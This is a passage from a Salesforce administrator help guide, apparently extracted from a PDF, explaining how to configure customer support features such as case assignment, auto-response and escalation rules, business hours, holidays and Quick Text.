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Renaming Actions and Feed Filters in Case Feed

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”

OR

“View Setup and Configuration”

AND

Designation as a translator

To rename actions and feed filters:

You can rename the Case Feed actions and feed filters so they match the terms your company uses. For example, if your
company refers to customers as guests, you might rename the Answer Customer action “Answer Guest.”

1. From Setup, click Customize > Tab Names and Labels > Rename Tabs and Labels.
2. Click Edit next to Cases in the list of standard tabs.
3. Click Next.
4. Find the label you want to change in the Other Labels list.
5. Type the new name for the label in the text box next to it.
6. If the new label begins with a vowel sound, check Starts with vowel sound.
7. Click Save.

AUTOMATING CONTACT CENTERS

Setting Up Customer Support
The available support setup options vary according to which Salesforce Edition you have.

If your organization uses cases and solutions, you can set up various automated support features. From Setup, click Customize
> Cases.

• Click Business Hours to set your organization’s support hours.

• Click Assignment Rules to create rules for automatically routing cases.

• Click Escalation Rules to create rules for automatically escalating cases.

• Click Support Settings to customize email templates and defaults for automated support features.

• Click Auto-Response Rules  to set up rules that send email to customers when they submit cases from one of the following:

◊ A Web-to-Case form

2154

Setting Up Customer SupportAutomating Contact Centers



◊ An Email-to-Case message

◊ An On-Demand Email-to-Case message

◊ A Customer Portal

◊ A Self-Service portal

• Click Email-to-Case to set up the ability to capture customer emails as cases. The setup specifies how the content of each
customer email automatically populates case fields.

For support features related to solutions, from Setup, click Customize  > Solutions.

• Click Solution Categories  to set up categories so your users can categorize the solutions they create.

• Click Solution Settings to enable specific options for solutions.

For additional support features, from Setup, click Customize > Self-Service.

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

• Click Public Solutions to set up public solutions for your customers to use when searching for solutions.

• Click Web-to-Case  to set up the ability to capture cases from your website.

• Click Self-Service Portal to set up your organization’s web portal for your customers to log cases and search for solutions.

For support features related to a Salesforce Customer Portal, from Setup, click Customize  > Customer Portal.

• Click Settings to set up your organization's Customer Portal so that your customers can log cases, search for solutions,
and access any custom objects you may have created for them.

For support features related to Salesforce CRM Call Center, from Setup, click Customize  > Call Center.

• Click Call Centers to set up new call centers and manage the users who are assigned to them.

• Click Directory Numbers to set up additional phone numbers that can be searched in a call center user's phone directory.

• Click SoftPhone Layouts to set up the layouts that are used to display call information in a call center user's SoftPhone.

To create support queues for cases or custom objects, from Setup, click Manage Users > Queues.

The support features include the ability to notify customers when their case is created manually or via the web, or when their
case is resolved. You can also automatically notify users when a case is escalated, created, or re-assigned. To use notification
emails, you must create email templates for each type of notification.

See Also:
Administrator tip sheet: Setting Up Customer Support
Administrator tip sheet: Getting the Most from Your Self-Service Portal
Administrator setup guide: Self-Service Implementation Guide
Administrator setup guide: Case Management Implementation Guide
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Customizing Support Settings
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Cases”

AND

“Customize Application”

To change support settings:

To select default support templates and automated support features for your organization:

1. From Setup, click Customize > Cases > Support Settings.
2. Click Edit.
3. Select the following settings and templates as necessary:

DescriptionField

The user or queue automatically assigned to all cases that don't
match any case assignment rule entries. This user must be
Active.

Default Case Owner

Select this checkbox to notify the default case owner when a
case is assigned to him or her. If the new owner is a queue,

Notify Default Case Owner

the notification is sent to the queue email address.
Notifications are system-generated and can't be modified.

Indicates which record type to assign to cases created by users
applying assignment rules. Select either:

Record Type Setting

• Keep the existing record type if you want new
cases to keep the creator's record type

• Override the existing record type with the
assignee's default record type if you want to
overwrite the creator's record type on new cases

The user listed in the Case History related list for automated
case changes. Automated case changes may occur from

Automated Case User

assignment rules, escalation rules, On-Demand
Email-to-Case, or cases logged in the Self-Service portal. This
user must have the System Administrator profile or the
“Modify All Data” and “Send Email” permissions.

The template used to notify contacts that their case was created
manually by a support agent. The notification is optional; it's

Case Creation Template

triggered by a checkbox on the case edit page. This template
must be Available for Use.
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DescriptionField

The template used to notify users that a case was manually
assigned to them by an administrator or another user. The

Case Assigned Template

notification is optional; it's triggered by a checkbox on the
Change Case Owner page. This template must be Available
for Use.

The template used to notify contacts that a case has been
closed. The notification is optional; it's triggered by a checkbox

Case Close Template

on the Close Case page. This template must be Available
for Use.

Automatically selects the Visible in Self-Service
Portal checkbox for all new cases, including cases created

New Cases Visible in Portal

via Web-to-Case, Email-to-Case, and On-Demand
Email-to-Case.

Regardless of this default, users creating new cases can
manually set the Visible in Self-Service Portal
checkbox.

Select this checkbox to notify contacts who aren't Self-Service
portal users when a case comment has been modified or added

Enable Case Comment Notification to Contacts

to a case. If you select this setting, click Case Comment
Template and choose the email template to use for these
notifications. This template must be Available for Use.

Select this checkbox to notify the case owner when a user adds
a public or private comment to a case. If you select this setting,

Notify Case Owner of New Case Comments

case owners can't opt out of receiving these notices. (Notices
aren't sent to inactive case owners.)

Select this checkbox to enable early triggers for escalation rules
and their actions.

You can set up an escalation rule to perform an action when
a case has been unresolved for a specific number of hours. The

Early Triggers Enabled

Age Over hour you specify determines when Salesforce
performs the escalation action. Enable early triggers to ensure
that your escalation actions are triggered before the Age Over
hour you specify.

Select this checkbox to enable the Suggested Solutions button
on case detail pages

For more information about how Customer Portal users can
self-close their own cases from suggested solutions, see
Enabling Customer Portal Login and Settings on page 1937.

Enable Suggested Solutions

Select this option to provide suggested articles on the Articles
related list. You can make suggested articles available in all

Enable Suggested Articles
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DescriptionField

Salesforce Knowledge channels except the public knowledge
base.

Select this checkbox to specify that case comment, attachment,
and assignment notifications sent to case owners are sent from

Send Case Notifications from System Address

a system address, rather than the address of the user who
updated the case.

System notifications display a “From” email address of
“noreply@salesforce.com”, and an email “Name” related to the
message, such as “Case Comment Notification”.

You can select this checkbox to prevent Self-Service or
Customer Portal users who update their cases from receiving
any “out-of-office” emails from case owners whose email is
set to “out-of-office”.

Select this checkbox to automatically select Send
Notification Email on cases when users change a case

Notify Case Owners when Case Ownership
Changes

owner to another user. This helps prevent users from forgetting
to notify other users that they're the new owner of a case.

Selecting this setting doesn't automatically select Send
Notification Email when users change a case owner to
a queue.

Select this checkbox to add closed statuses to the Status field
on cases so that users can close cases without having to click

Show Closed Statuses in Case Status Field

the Close Case button and update information on close case
page layouts. See Closing Cases on page 1697.

Selecting Show Closed Statuses in Case Status
Field doesn't remove the Close button from case list views.
Instead, it adds Closed to the list of statuses available for users
to choose from when they select multiple cases and click
Change Status on case list views. See Viewing Case Lists on
page 1661.

After selecting Show Closed Statuses in Case
Status Field as described above, you can select this

Hide Save & Close Button and Cls Links

checkbox so that the Save & Close button on case edit
pages and Cls links on Cases related lists don't display
unnecessarily. Instead, users close cases via the Status field
and Save button.
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Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

See Also:
Capturing Web Cases
Setting Up Customer Support

Setting Business Hours
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Business Hours Holidays”To set business hours:

You can specify the business hours at which your customer support team operates, including multiple business hours in multiple
time zones. Setting business hours lets you apply specific time zones and locations to:

• Cases

• Case escalation rules

• Case milestones in entitlement processes

After you set business hours, users can click Business Hours on a case to set the times at which a support team is available
to work on the case. Additionally, users with the “Customize Application” permission can add business hours to escalation
rules so that when the details of a case match the criteria of an escalation rule, the case is automatically updated and escalated
with the times and location on the rule. For example, a case updated with Los Angeles business hours only escalates when a
support team in Los Angeles is available. By default, business hours are set 24 hours, seven days a week in the default time
zone specified in your organization's profile.

To set business hours:

1. From Setup, click Company Profile > Business Hours.
2. Click New Business Hours.
3. Enter a name for the business hours.

We recommend that you enter text in the Business Hours Name field that will remind users of a location or time zone
when they view business hours on a case. For example, if your business hours are for a support center in San Francisco,
you could enter San Francisco Business Hours.

4. Click Active to allow users to associate the business hours with cases and escalation rules.

Click Active again to deactivate the business hours. You cannot delete business hours.

5. Optionally, click Use these business hours as the default to set the business hours as the default business
hours on all new cases.
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Default business hours on cases can be updated with business hours on escalation rules if the cases match escalation rule
criteria and the rule is set to override business hours.

6. Choose a time zone to associate with the business hours in the Time Zone drop-down list.
7. Set your business hours for each day of the week:

• By default, the 24 hours checkbox is selected next to each day. Deselect this checkbox if your support team is
unavailable during the entire day. When you deselect the 24 hours checkbox, you can enter start and end times for
the business hours, or leave the fields blank.

• Choose the start and end times for the business hours. If a time is not available, click the field and enter the time. Start
times must be earlier than end times.

8. Click Save.
9. Optionally associate the business hours to:

• Escalation rules so that when the details of a case match the criteria of an escalation rule, the case is updated and
escalated with the business hours on the rule.

• Holidays so that business hours and any escalation rules associated with business hours are suspended during the dates
and times specified in holidays. For more information, see Setting Holidays on page 2161.

To update business hours, from Setup, click Company Profile > Business Hours and click the Edit link next to the name of
the business hours you wish to update.

Tips on Setting Business Hours
Consider the following when setting business hours:

• After you set business hours, add the Business Hours lookup field to case layouts and set field-level security on the
Business Hours field. This allows users to view and update business hours on a case.

• Business hours on a case are automatically set to your organization's default business hours, unless the case matches the
criteria on an escalation rule associated with different business hours.

• Salesforce automatically calculates daylight savings times for the time zones available for business hours.
• Escalation rules only run during the business hours with which they are associated.
• You can update cases associated with business hours that are no longer active without having to reactivate business hours.
• You cannot include the Business Hours field in list views or reports.
• You can create multiple business hours for support teams that operate in the same time zone but at different hours.
• For simplicity, we recommend that you create one set of business hours per support center.
• You cannot deactivate business hours that are included in escalation rules. You must first remove them from the escalation

rules.
• You can associate up to 1000 holidays with each set of business hours.
• Business hours on a case take precedence over business hours on entitlements. Business hours on entitlements only add

business hours to cases created from entitlements. For example, if you add an entitlement with business hours to a case
that already has business hours, the entitlement's business hours are ignored.

See Also:
Setting Up Customer Support
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Setting Holidays
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Business Hours Holidays”To set holidays:

Holidays enable you to specify the dates and times at which your customer support team is unavailable. After you create a
holiday, you can associate it with business hours to suspend business hours and escalation rules during the dates and times
specified in the holiday. For more information, see Setting Business Hours on page 2159.

To set holidays:

1. From Setup, click Company Profile > Holidays.

• Click Edit to edit an existing holiday.
• Click Del to delete an existing holiday.

You can only delete a holiday that is not associated with any business hours.

• Click Clone next to an elapsed holiday to clone it.

The Elapsed Holidays related list displays holidays that have occurred in the past. You can only clone elapsed holidays.

If the Go to list link appears at the bottom of the Holidays or Elapsed Holidays related list, click it to display all the
items. From the list you can edit or delete any existing holiday, or clone any elapsed holiday.

Warning:  Any elapsed holidays that you delete are not moved to the Recycle Bin. They cannot be recovered.

The recurring icon ( ) displays next to the date and time of recurring holidays.

2. Click New.
3. Enter a name for the holiday.
4. Enter a date for the holiday.

If you want the holiday to span more than one day:

a. Select the Recurring Holiday checkbox.
b. Enter the first day of the holiday in the Start Date field.
c. Deselect the No End Date checkbox in the End Date field.
d. Enter the last day of the holiday in the End Date field.

5. Optionally, you can:

• Specify the exact times at which the holiday takes place by deselecting the All Day checkbox next to the Time field
and entering the exact times.

• Select the Recurring Holiday checkbox to schedule the holiday to recur during specific dates and times:
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◊ In the Frequency field, select the frequency at which the holiday recurs. When you click the Daily, Weekly, or
Monthly fields, more options display that allow you to refine frequency criteria.

◊ In the Start Date and End Date fields, specify the dates during which you wish the holiday to recur.

The following error message displays if you select a start date and end date that does not correspond with the
frequency you selected: The recurring holiday has no occurrence.

6. Click Save.
7. Click Add/Remove on the Business Hours related list.
8. Add or remove business hours to the holiday by selecting business hours in the Available Business Hours column, and

clicking the Add or Remove arrows to add or remove business hours to the Selected Business Hours column.
9. Click Save.

Tips on Setting Holidays
Consider the following when setting holidays:

• You can associate a holiday with multiple business hours.
• You can associate up to 1000 holidays with each set of business hours.
• Holidays automatically acquire the time zone of the business hours with which they are associated. For example if you

associate a holiday to business hours that are in Pacific Standard Time, the holiday will take effect for those business hours
in Pacific Standard Time.

• Holiday names do not need to be unique. For example, you could enter multiple holidays named New Year's Day.
• Currently, there are no limits to how many holidays you can create for your organization.
• Currently, report results do not take into account holidays.
• If you schedule a holiday to recur on a specific day of every month, the holiday will only recur on months that have that

specific day. For example, if you schedule a holiday on the 31st day of every month, then the holiday will only recur on
months that have 31 days. If you want a holiday to recur on the last day of every month, choose last from the On day of
every month drop-down list.

• You can only add business hours marked as Active to holidays. For more information, see Setting Business Hours on
page 2159.

See Also:
Setting Up Customer Support
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Setting Up Assignment Rules

Lead Assignment Rules available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

Case Assignment Rules available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create assignment rules:

Each entry defines a condition that determines how leads or cases are processed.

To create an assignment rule:

1. From Setup, click Customize from the top of any page.
2. Select Leads  or Cases, and click Assignment Rules.
3. Choose New, and give the rule a name. Specify whether you want this to be the active rule for leads or cases created

manually and via the web and email. Click Save.
4. To create the rule entries, click New. For each entry, you can specify the following:

DescriptionField

Sets the order in which the entry will be processed in the rule,
for example, 1, 2, 3.

Salesforce evaluates each entry in order and tries to match the
criteria of the entry. As soon as a match is found, Salesforce

Order

processes the item and stops evaluating the rule entries for
that item. If no match is found, the item is reassigned to either
the default Web-to-Lead owner, the administrator doing a
lead import, or the default case owner.

Specifies conditions that the lead or case must match for it to
be assigned.

Enter your rule criteria:

Criteria

• Choose criteria are met and select the filter criteria
that a record must meet to trigger the rule.For example,
set a case filter to Priority equals High if you want
case records with the Priority field marked High to
trigger the rule.

If your organization uses multiple languages, enter filter
values in your organization’s default language. You can
add up to 25 filter criteria, of up to 255 characters each.

• Choose formula evaluates to true and enter a
formula that returns a value of “True” or “False.” Salesforce
triggers the rule if the formula returns “True.” For example,
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DescriptionField

the formula AND(ISCHANGED( Priority ),
ISPICKVAL (Priority, "High") ) triggers a rule
that changes the owner of a case when the Priority field
is changed to High.

Note that if your condition uses a custom field, the rule entry
will automatically be deleted if the custom field is deleted.

Specifies the user or queue to which the lead or case will be
assigned if it matches the condition. Users specified here

User

cannot be marked “inactive” and they must have “Read”
permission on leads or cases.

Note:  You can't revoke the “Read” permission on
leads or cases for users assigned to a rule.

If your organization uses divisions, leads are assigned to the
default division of the user or queue specified in this field.
Cases inherit the division of the contact to which they are
related, or are assigned to the default global division if no
contact is specified.

Specifies that the current owner on a lead or case will not be
reassigned to the lead or case when it is updated.

Do Not Reassign Owner

Specifies the template to use for the email that is automatically
sent to the new owner. If no template is specified, no email

Email Template

will be sent. When assigning a lead or case to a queue, the
notification goes to the Queue Email address specified for
the queue and all queue members.

Specifies the predefined case team(s) to add to a case when it
matches the condition. A case team is a team of users that

Predefined Case Teams

work together on a case. For example, your case team may
include a support rep, support manager, and a product
manager.

Click the Lookup icon ( ) to select a predefined case team
to add to the assignment rule. To add more predefined case
teams, click Add Row to add a new row with which you can
add a predefined case team.

Specifies that any existing predefined case teams on the case
are replaced with the predefined case teams on the condition,
when a case matches the condition.

Replace any existing predefined case teams
on the case

After creating the entry, click Save, or Save & New to save the entry and create more entries.
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Tip:  To create an error-proof rule, always create the last rule entry with no criteria. This rule entry will catch any
leads or cases that the previous rule entries did not assign.

Tip: Salesforce processes rules in the following order:

1. Validation rules
2. Assignment rules
3. Auto-response rules
4. Workflow rules (with immediate actions)
5. Escalation rules

See Also:
Viewing and Editing Assignment Rules
Managing Assignment Rules

Viewing and Editing Assignment Rules

Lead Assignment Rules available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

Case Assignment Rules available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To change assignment rules:

“View Setup and Configuration”To view assignment rules:

To view and edit assignment rules:

• To edit the name of a rule, click Rename next to the rule name.

• To edit the entries for a rule, choose the rule name from the list of rules. Click New to add an entry; choose Edit or Del
to edit or delete an entry; select Reorder to change the order in which the entries apply.

See Also:
Setting Up Assignment Rules
Managing Assignment Rules

2165

Setting Up Assignment RulesAutomating Contact Centers



Managing Assignment Rules

Lead Assignment Rules available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

Case Assignment Rules available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create or change assignment rules:

Create assignment rules to automate your organization’s lead generation and support processes.

• Lead Assignment Rules—Specify how leads are assigned to users or queues as they are created manually, captured from
the web, or imported via the lead import wizards.

• Case Assignment Rules—Determine how cases are assigned to users or put into queues as they are created manually,
using Web-to-Case, Email-to-Case, On-Demand Email-to-Case, the Self-Service portal, the Customer Portal, Outlook,
or Lotus Notes.

Typically, your organization will have one rule for each overall purpose—for example, one lead assignment rule for importing
and a different lead assignment rule for web-generated leads; or one case assignment rule for standard use and one case
assignment rule for holiday use. For each rule type, only one rule can be in effect at any time.

Each rule consists of multiple rule entries that specify exactly how the leads or cases are assigned. For example, your standard
case assignment rule may have two entries: cases with “Type equals Gold” are assigned to “Gold Service” queue, and cases
with “Type equals Silver” are assigned to “Silver Service” queue.

To create an assignment rule, from Setup, click Customize from the top of any page. Then select Leads  or Cases, and click
Assignment Rules.

Sample Assignment Rule

The following case assignment rule assigns a case to a specific queue based on the account rating:

Rule Name — Hot Account Assignment

Rule Entries:

Assign ToCriteriaOrder

Tier 1 Support QueueISPICKVAL(Account.Rating, "Hot")1

Tier 2 Support QueueOR( ISPICKVAL(Account.Rating, "Warm") ,
ISPICKVAL(Account.Rating, "Cold") )

2

See Also:
Setting Up Assignment Rules
Viewing and Editing Assignment Rules
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Setting Up Auto-Response Rules
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create auto-response rules:

An auto-response rule is a set of conditions for sending automatic email responses to lead or case submissions based on the
attributes of the submitted record. Applicable leads include those captured through a Web-to-Lead form. Applicable cases
include those submitted through a:

• Self-Service portal

• Customer Portal

• Web-to-Case form

• Email-to-Case message

• On-Demand Email-to-Case message

You can create as many response rules as you like based on any attribute of the incoming lead or case, but only one rule for
leads and one for cases can be active at a time. The email responses are listed in the Activity History related list of the lead or
contact and the Email related list on cases.

Creating Auto-Response Rules
To create a Web-to-Lead response rule, from Setup, click Customize > Leads > Auto-Response Rules. To create a response
rule for cases, from Setup, click Customize > Cases > Auto-Response Rules. On the Auto-Response Rules page:

1. Click New.
2. Enter the rule name.
3. Check the active box to make this rule the only one activated.
4. Click Save.
5. Create rule entries.

Creating Response Rule Entries
1. Click New from the rule detail page.
2. Enter a number to specify the order this entry should be processed.

The rule processes entries in this order and stops processing at the first matching entry and then sends the email using the
specified email template. If no response rules apply, the rule uses the default template you specify on the Web-to-Case or
Web-to-Lead Settings page.

Note:  To create an error-proof rule, always create the last rule entry with no criteria. This rule entry will catch
any leads or cases that the previous rule entries did not. This is especially important for Email-to-Case and
On-Demand Email-to-Case which don't have default templates.

3. Enter your rule criteria:
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• Choose criteria are met and select the filter criteria that a record must meet to trigger the rule. For example, set
a case filter to Priority equals High if you want case records with the Priority field marked High to trigger
the rule.

If your organization uses multiple languages, enter filter values in your organization’s default language. You can add
up to 25 filter criteria, of up to 255 characters each.

• Choose formula evaluates to true and enter a formula that returns a value of “True” or “False.” Salesforce
triggers the rule if the formula returns “True.” For example, the formula
AND(ISPICKVAL(Priority,"High"),Version<4.0) triggers a rule that automatically responds with the selected
template if the Priority field on a case is set to High and the value of a custom field named Version on the case
is less than four.

4. Enter an email sender’s name.
5. Enter an email address for the sender. This must be different from the routing address you use for Email-to-Case.
6. Enter a reply-to address.
7. Select an email template.
8. Click Save.

Managing Auto-Response Rules
After you've set up your auto-response rules and rule entries:

• Click Edit to change the rule name.
• Click New next to the Rule Entries list to create a new rule entry.
• Click Reorder next to the Rule Entries list to change the order they are processed.
• Click Edit next to a rule entry to change it.
• Click Del next to a rule entry to delete it.

Tip: Salesforce processes rules in the following order:

1. Validation rules
2. Assignment rules
3. Auto-response rules
4. Workflow rules (with immediate actions)
5. Escalation rules

See Also:
Differences Between Auto-Response Rules and Workflow Alerts
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Differences Between Auto-Response Rules and Workflow Alerts

Auto-response rules available in: Professional, Enterprise, Unlimited, and Developer Editions

Workflow alerts available in: Enterprise, Unlimited, and Developer Editions

Auto-response rules and workflow alerts provide similar functionality. The following table lists some of the differences between
workflow alerts and auto-response rules to help you determine which process to use:

Number of Emails
Sent

Sends Email ToRuns WhenDesigned ForType of Process

Sends as many emails as
there are matching
criteria in the workflow.

Anyone you choose who
is associated to the Case
or Lead object.

A case or lead is created
or edited.

Notifications to
interested parties.

Workflow alerts

Sends one email based
on the first rule entry

Contact on a case or the
person who submitted
the lead on the Web.

A case or lead is
created.

Initial response to the
contact who created a
case or the person who
submitted the lead on
the Web.

Auto-response rules

criteria it matches in a
sequence of rule entries.

See Also:
Setting Up Auto-Response Rules

Setting Up Escalation Rules
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create escalation rules:

Each rule defines a condition that determines how cases are processed.

To create an escalation rule:

1. From Setup, click Customize  > Cases > Escalation Rules.
2. Choose New, and give the rule a name. Specify whether you want this to be the active escalation rule. Click Save.
3. To create the rule entries, click New. For each entry, you can specify the following:
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DescriptionField

Sets the order in which the entry will be processed in the
rule, for example, 1, 2, 3.

Salesforce evaluates each entry in order and tries to match
the criteria of the entry. As soon as a match is found,

Order

Salesforce processes the item and stops evaluating the rule
entries for that item. If no match is found, the case is simply
not escalated.

Specifies conditions that the case must match for it to be
escalated.

You can enter your rule criteria:

Criteria

• Choose criteria are met and select the filter criteria
that a record must meet to trigger the rule. For example,
set a case filter to Priority equals High if you
want case records with the Priority field marked High
to trigger the rule.

If your organization uses multiple languages, enter filter
values in your organization’s default language. You can
add up to 25 filter criteria, of up to 255 characters each.

• Choose formula evaluates to true and enter a
formula that returns a value of “True” or “False.”
Salesforce triggers the rule if the formula returns “True.”
For example, the formula AND(ISCHANGED( Priority
), ISPICKVAL (Priority, "High") ) triggers a
rule that changes the owner of a case when the
Priority field is changed to High.

Note that if your condition uses a custom field, the rule entry
will automatically be deleted if the custom field is deleted.

Specifies how business hours apply to an escalated case:Specify business hours criteria

• Ignore business hours - Select this field to ignore
business hours when escalating a case.

• Use business hours specified on case - Select
this field to use the existing business hours on a case
when escalating it.

• Set business hours - Select this field and click the

lookup icon ( ) to select predefined business hours to
apply to a case when escalating it.

Escalation actions only run during the business hours with
which they are associated.
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DescriptionField

Determines what field applies to your Age Over number
of hours. Your Age Over setting can be based on the
number of hours since:

Specify how escalation times are set

• A case was created
• The case was created unless it has been modified; once

modified, the case will never get escalated
• The most recent time a case was modified

For example, if you choose Based on last
modification time of the case and your Age Over
setting is 5, cases will get escalated 5 hours after the most
recent last modified time and date as long as the case is open.

4. After creating the entry, click Save, or Save & New to save the entry and create more entries.
5. After you create the last entry, click Save. The escalation rule and a list of one or more rule entries are displayed.

Note:  To create an error-proof rule, always create the last rule entry with no criteria. This rule entry will catch
any cases that the previous rule entries did not assign.

6. Specify what action you want to be taken when one of the escalation rule entries is true. Click Edit next to the name of
one of the rule entries.

7. Click New to add an escalation action. You can specify up to five actions for each rule entry, to escalate the case over
increasing periods of time. For each escalation action, you can specify the following:

DescriptionField

Specifies the number of hours after which a case should be
escalated if it has not been closed. This time is calculated

Age Over

from the date field set in the Specify how escalation
times are set field. No two escalation actions can have
the same number in this field.

Specifies the user, partner user, or queue to which the case
will be assigned if it matches the condition. Users specified

Assign To

here cannot be marked “inactive” and they must have the
“Read” permission on cases.

Note:  You can't revoke the “Read” permission on
leads or cases for users assigned to a rule.

Note that reassigning an escalated case is optional.

Specifies the template to use for the email that is
automatically sent to the new owner specified in the Assign
To field. If no template is specified, no email will be sent.

Notification Template
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DescriptionField

Specifies the user to notify when the case is escalated.
Notifying another user is optional.

Notify this user

Indicates that the owner of the case is notified when the case
is escalated.

Notify Case Owner

Specifies the template to use for the notification email that
is automatically sent to the Notify user(s). If you choose a
user in the Notify field, you must select a template.

Notification Template

Specifies additional individuals that you want to notify upon
escalation.

Additional Emails

Note:  Each time you save a case or change the case owner, your escalation rules re-evaluate that case. Once the case
matches an escalation rule entry, calculates when the case should be escalated and stops checking other escalation rule
entries. For example, if you have two escalation rule entries that specify:

• Escalate three hours after creation date if Case Reason equals Crash

• Escalate four hours after creation date if Case Reason equals Bug

A case created with Case Reason of Bug will be scheduled for escalation four hours after it was created. Later, a
user changes the case, which causes the escalation rules to re-evaluate the case. If escalation rules find that the Case
Reason is now Crash, it schedules the case to be escalated three hours after creation date. If the case was created more
than three hours ago, the case is escalated as soon as possible.

Escalation rules are not evaluated when transferring multiple cases at one time from a case list view. Also note that
if you use assignment rules to change case ownership, the escalation rules are evaluated before any assignment rules.

Tip: Salesforce processes rules in the following order:

1. Validation rules
2. Assignment rules
3. Auto-response rules
4. Workflow rules (with immediate actions)
5. Escalation rules

See Also:
Creating Escalation Rules
Viewing and Editing Escalation Rules
Monitoring the Case Escalation Rule Queue
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Creating Escalation Rules

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create or change escalation rules:

Create case escalation rules to escalate cases automatically if they are not resolved within a certain period of time.

Typically, your organization will have one escalation rule that consists of multiple entries which specify exactly how the cases
are escalated. For example, your standard case escalation rule could have two entries: cases with Type set to Gold are escalated
within two hours, and cases with Type set to Silver are escalated within eight hours.

See Also:
Setting Up Escalation Rules
Viewing and Editing Escalation Rules

Viewing and Editing Escalation Rules

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To change escalation rules:

To view and edit escalation rules:

• To edit the name of a rule, click Rename next to the rule name.

• To edit the entries for a rule, choose the rule name from the list of rules. Click New to add an entry; choose Edit or Del
to edit or delete an entry; select Reorder to change the order in which the entries apply.

See Also:
Setting Up Escalation Rules
Creating Escalation Rules
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Setting Up Quick Text
Available in: Group, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To set up Quick Text:

Quick Text lets users create standard messages, such as greetings and answers to common questions, which support agents
can easily insert into communications with customers.

To set up Quick Text:

1. Enable Quick Text. Note: Quick Text is automatically enabled for organizations that have enabled Live Agent.
2. Optionally, customize Quick Text settings.
3. Grant permissions to users so that they can create Quick Text messages.
4. Create Quick Text messages.
5. If your organization uses Live Agent, give agents access to the Quick Text sidebar in the Live Agent console.

Enabling Quick Text

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Customize Application”To enable Quick Text:

Note:  Once you enable Quick Text, you can’t disable it.

1. From Setup, click Customize > Cases > Quick Text > Settings.
2. Click Enable Quick Text.
3. Click Save.

See Also:
Setting Up Quick Text
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Customizing Quick Text Settings

Available in: Group, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To customize Quick Text:

Quick Text lets users create standard messages, such as greetings and answers to common questions, which support agents
can easily insert into communications with customers.

By customizing Quick Text, you make it more useful to your support agents, and can add fields, categories, triggers, and rules
that support your business’ needs. You can do any of the following to customize Quick Text:

• Customize standard fields, create custom fields (such as categories and subcategories relevant to your company’s Quick
Text messages), and define field dependencies to associate categories and subcategories.

• Create validation rules.
• Define Apex triggers.
• Customize, create, and assign page layouts.
• Customize search layouts.
• Customize buttons and links.
• Create record types.

See Also:
Setting Up Quick Text

Giving Support Agents Access to Quick Text

Available in: Group, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To set up Quick Text:

Quick Text lets support agents choose standard messages to include in their chats and emails with customers. To allow agents
to use Quick Text in the Live Agent console, Live Agent in the Service Cloud console, or the Email publisher in Case Feed:

• Give them “Read” permission on Quick Text
• Do one of the following:
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StepsOption

Give agents ownership of at least one Quick Text message ◊ Transfer ownership of existing Quick Text messages to
the agents (click Change next to Owner on the record),
or

◊ Have them create new messages

Change your organization-wide default sharing setting for
Quick Text

1. From Setup, click Security Controls > Sharing Settings.
2. In Organization-Wide Defaults, click Edit.
3. Select Public Read Only or Public Read-Write in the

Default Access dropdown list forQuick Text.
4. Click Save.

If you don’t want to change your organization-wide default
sharing settings, create sharing rules to specify which groups

Use sharing rules

of users should have at least Read Only access to Quick Text
messages.

See Also:
Setting Up Quick Text

Creating Quick Text Messages

Available in: Group, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create,” “Read,” “Edit,” and “Delete” on Quick TextTo create Quick Text messages:

1. Click the Quick Text tab.
2. Click New.
3. If you have more than one Quick Text record type, select a record type for the new message and then click Continue.
4. Type a message name.
5. Type the message. It can include line breaks, lists, and special characters, and can be up to 4,096 characters.
6. Click Available Merge Fields to display the merge field selector.
7. Select the channels in which you want the message to be available. For example, to make it available in the Case Feed

Email publisher, select Email.
8. Select a category.
9. Optionally, select a subcategory.
10. Click Save.
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Tip:  Click Test and Verify Merge Fields to view a sample of the quick text populated with data from records
you choose.

See Also:
Setting Up Quick Text

MONITORING SUPPORT PROCESSES

Monitoring Automated Process Actions
Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Modify All Data”To manage automated-process actions:

Salesforce Knowledge users can schedule articles to be published or archived on a specific date. Use the automated-process
actions queue to view these pending actions and cancel them if necessary.

To view pending actions:

1. From Setup, click Monitoring > Automated Process Actions.
2. Click Search to view all pending actions for any article, or set the filter criteria and click Search to view only the pending

actions that match the criteria. The filter options are:

Process Definition

The process that is triggering the action. This value is always “KBWorkflow.”

Object

The object that triggered the pending action. This value is always “Knowledge Article.”

Scheduled Date

The date the pending actions are scheduled to occur.

Create Date

The date the article that triggered the pending action was created.

Created By

The user who created the article that triggered the pending action.
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Record Name

The name of the article that triggered the pending action.

The filter is not case-sensitive.

To cancel pending actions:

1. Select the box next to the pending actions you want to cancel.
2. Click Delete. Salesforce cancels the pending action.

Monitoring the Case Escalation Rule Queue
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Modify All Data”To manage the case escalation rule queue:

When Salesforce triggers a case escalation rule that has time-dependent actions, use the escalation rule queue to view pending
actions and cancel them if necessary.

To view pending actions:

1. From Setup, click Monitoring > Case Escalations.
